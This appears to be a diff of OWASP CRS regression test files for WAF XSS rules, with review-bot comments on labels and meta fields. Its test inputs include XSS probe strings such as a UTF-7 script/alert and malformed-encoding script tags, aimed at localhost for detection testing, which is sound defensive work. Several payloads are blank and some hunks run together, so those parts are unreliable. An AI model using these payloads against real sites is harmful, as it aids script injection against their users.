"OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + no_log_contains: id "941180" + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log_contains: id "941180" + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "941180" 
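Review bot: test_id 3 is described as `Node-validator deny list keywords, ARGS_NAMES`, but its payload travels in the `Cookie` header (`window.location=941180-3`), so the description names the wrong target and duplicates test_id 2's; the 941190 file in this same patch labels the equivalent cookie case `COOKIES_NAMES`. Change it to `desc: Node-validator deny list keywords, COOKIES_NAMES`. The two negative tests (test_id 4 pinning that `-->` is left to the stricter sibling 941181, test_id 7 pinning that a plain path segment does not trip the rule) are the valuable regression guards here; test_id 6 cites issue #2512, and a similar one-line reference above test_id 7 naming the false-positive it protects against would help whoever next tightens the regex.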
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index a6f3217f3..5b2724d56 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml 
@@ -1,75 +1,70 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941181" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2fe..f81fc28d0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml 
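Review bot: The added `rule_id: 941181` now sits directly under `description: "Tests to trigger, or not trigger 941180"`, which names the wrong rule (apparently copied from the 941180 file); since this commit already rewrites the meta block, fix it to `description: "Tests to trigger, or not trigger 941181"`. Two smaller labelling points in the same hunk: test_id 2 still sends `'941181-1=--%3E'` (the test-1 label) and test_id 4 is described as `ARGS_NAMES` while its payload is in the `Cookie` header. Neither affects matching, but these labels are what a reader uses to map an audit-log line back to a test, so `941181-2=--%3E` and `COOKIES_NAMES` would be more accurate.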
@@ -1,92 +1,86 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941230" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941230" 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de58..2967f2214 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -2,38 +2,34 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941240.yaml tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941240" + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941250" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f52c..de2b0b855 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml 
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -2,40 +2,36 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941260.yaml tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941260" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log_contains: id "941260" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d797b..87ea07326 100644 
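Review bot: Unlike the 941150, 941180, 941181 and 941190 hunks in this same patch, this file gets integer `test_id`s but no `rule_id: 941260` in its meta block, and `description` remains the placeholder `None` (a plain YAML string, not a null). If the new runner composes the test name from `rule_id` and `test_id`, the tests here would not be addressable as `941260-1`/`941260-2` (for instance from a platform override file) unless it falls back to the filename — I cannot tell from the hunk which it does, so please confirm. Adding `rule_id: 941260` and a real description such as `description: "Tests to trigger, or not trigger 941260"` removes the ambiguity either way.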
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941270.yaml tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log_contains: id "941270" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log_contains: id "941270" 
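Review bot: The meta block here is left without a `rule_id: 941270` entry while several sibling files in this patch gain one, so if the runner needs it to name tests this file silently depends on a filename fallback; add `rule_id: 941270` for consistency. The descriptions are also the least informative part of the hunk now that `test_title` is gone: test_id 1's URI decodes to `<link / asdf href  /= `, so something like `desc: "IE XSS Filters: <link> with href attribute, ARGS (GET)"` would tell a reader what the regression actually covers, and test_id 2's `desc` should likewise name the vector rather than only its source cheatsheet.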
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c10..7753e0936 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
@@ -2,42 +2,38 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941280.yaml tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941280" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log_contains: id "941290" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941290" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b15a..4952f90dc 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml 
@@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941300.yaml tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log_contains: id "941300" + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941300" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac17d..7d7e98d5b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml 
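Review bot: Both tests in this hunk carry the identical `desc: "IE XSS Filters"` even though test_id 1 places the vector in a GET parameter name (`/get?%3cOBJECT%20data%20%3d=sdffdsa`, i.e. `<OBJECT data =` matched via ARGS_NAMES) and test_id 2 sends it in a POST body; with `test_title` removed, `desc` is the only human-readable identifier left in a failure report, so make them distinct, e.g. `desc: "IE XSS Filters, <OBJECT data=> in ARGS_NAMES (GET)"` and `desc: "IE XSS Filters, ARGS (POST)"`. As with the 941260 and 941270 hunks, no `rule_id: 941300` is added and `description` stays `None`; if the runner derives the rule id from `rule_id` rather than the filename, add it here too.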
@@ -2,226 +2,213 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: 
